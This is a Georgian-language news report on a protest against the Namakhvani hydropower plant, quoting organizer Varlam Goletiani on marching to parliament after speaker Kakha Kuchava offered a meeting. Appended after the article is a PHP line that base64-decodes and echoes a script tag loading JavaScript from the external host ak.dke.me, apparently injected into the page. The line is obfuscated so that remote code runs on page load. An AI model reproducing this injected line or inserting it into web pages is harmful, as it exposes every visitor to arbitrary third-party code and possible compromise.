celsiusi
ავერსი საქკაბელი
„ნამახვანჰესის" მშენებლობის წინააღმდეგ მიმდინარე აქციის ერთ-ერთი ორგანიზატორის, ვარლამ გოლეთიანის განცხადებით, აქციის მონაწილეები მსვლელობით პარლამენტისკენ გაემართებიან.
 
როგორც გოლეთიანმა განაცხადა, მათ პარლამენტის თავმდჯომარე კახა კუჭავა დაუკავშირდა და შეხვედრა შესთავაზა.
 
გოლეთიანის თქმით, თუკი, ისინი დათანხმდებიან და პარლამენტიდან გარეთ გამოვლენ, სათქმელს ეტყვიან, მშვიდობიანი დახვედრა უნდა უზრუნვეყონ, თუ არ გამოვლენ, რამდენიმე ადამიანი პირადპირი ეთერის რეჟიმში, მედიის თანდასწრებით შევა.
 
აღნიშნულს აქციის მონაწილეები დაეთანხმნენ, ისინი ახლა ზარს პარლამენტიდან ელოდებიან.
 
„ჩვენ დაგვიკავშირდა პარლამენტის თავმჯდომარე, კახა კუჭავა და შემოგვთავაზა შეხვედრა. არ ვიცით, ამ გამოსვლების შემდეგ, მას რას აქვს ჩვენთვის სათქმელი, მაგრამ ვინც აქ ვართ, გვინდა ეს საკითხები ერთად გავიაროთ და გადავწყიტოთ. ჩვენ ვუთხარით ასეთი რამ, ოღონდ ეს ყველაფერი უნდა შეთანხმებულიყო ერთობით და აქვე მინდა ვთქვა, რომ ჩვენ არანაირ პასუხიმგებლობას ჩვენ თავზე არ ვიღებთ, ეს არის კრებითი გადაწყვეტილების საკითხი. ჩვენ ყველა ერთად უნდა ვიყოთ ჩართული ამ პროცესში. არც მე და არც აქ მდგომი ადამიანები, ვინც სიტყვით გამოვდივართ, არ ვართ პოლიტიკური ფიგურები, რომ პასუხიმგებლობები ავიღოთ ამა თუ იმ მოქმედებებზე. ჩვენ ქართველი ხალხი, თანაბრად ვიღებთ პასუხიმგებლობას ამ პროტესტზე და ამ ბრძოლაზე. ეს მკაფიოდ გაითავისოს ყველამ და ნუ იქნება მცდელობები იმისა, რომ ამა თუ იმ პერსონებზე მოხდეს იდენტიფიცირება, რომ ჩვენ ვმართავთ, ან ჩვენ ვართ წამმართველი აქ, ამ პროცესის. ჩვენ უბრალოდ გამხმოვანებელი ვართ იმ დარღვევების და იმ გადაცდომების, რასაც ვხედავთ სახელისუფლებო წრეების მხრიდან. გადაწყვეტილებას იღებს ქართველი ხახლი, ამიტომ რაზეც შევთანხმდებით დღეს ჩვენ აქ, ის იქნება ჩვენი გადაწყვეტილება და პასუხიმგებლობა იქნება კრებითი და კოლექტიური.
 
ჩვენ ვუთხარით მათ ასეთი რამ: ჩვენ შეგვიძლია პარლამენტისკენ დავიძრათ, შემოუაროთ უკანა მხრიდან პარლამენტს, სადაც თუ ექნება ჩვენთან კომუნიკაციის სურვილი თავმჯდომარეს, გამობრძანდეს. ჩვენ ვუზრუველყოფთ პოლიციასთან ერთად მშვიდობიან შეხვედრას თავმჯდომარესთან. არ იყოს არც შეძახილი, ჩვენ ეს არ გვჭირდება არაფერში. მშვიდობიანად დავდგეთ ყველამ ერთად და მოვისმინოთ, რა აქვთ სათქმელი. თუ გამოვლენ და შეგხვდებიან და გვეტყვიან სათქმელს, ვუზრუნველყოთ მშვიდობიანი დახვედრა და ვიყოთ პასუხიმგებელი ამ საკითხში პოლიციასთან ერთად. თუ არ გამოვლენ ამ შეხვედრაზე და ვართ თანახმა ჩვენ, რომ შევიდეთ რამდენიმე ადამიანი მედიასთან ერთად და დაველაპარაკოთ, დანარჩენი საზოგადეობა გარეთ იდგეს და მოისმინოს პოზიცია, თუ რას იტყვის ის", - აღნიშნა გოლეთიანმა.
 
გოლეთიანის თქმით, პიკეტირება რაც დაგეგმილი ჰქონდათ მოთხოვნების შეუსრულებლობის შემთხვევაში, აუცილებლად იქნება.
 
„აქ გაჩუმება დანაშუალია, ამიტომ მოვუწოდებთ ყველას, რომ არ დატოვონ თავისი ადგილი ცარიელი ამ მოედანზე, ყველა უნდა გამოვდიეს დღეს ისევ აქ... რჩება ერთი გზა, ან ვიშლებით და ვანებებთ ამ ქვყენის ყვლეფას, როგორც აკეთებენ ამას, ან მშვდიობიანად, კოსნტრუქციულად მიგვყავს საქმე ბოლომდე“, - განაცხადა გოლეთიანმა.
1277
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");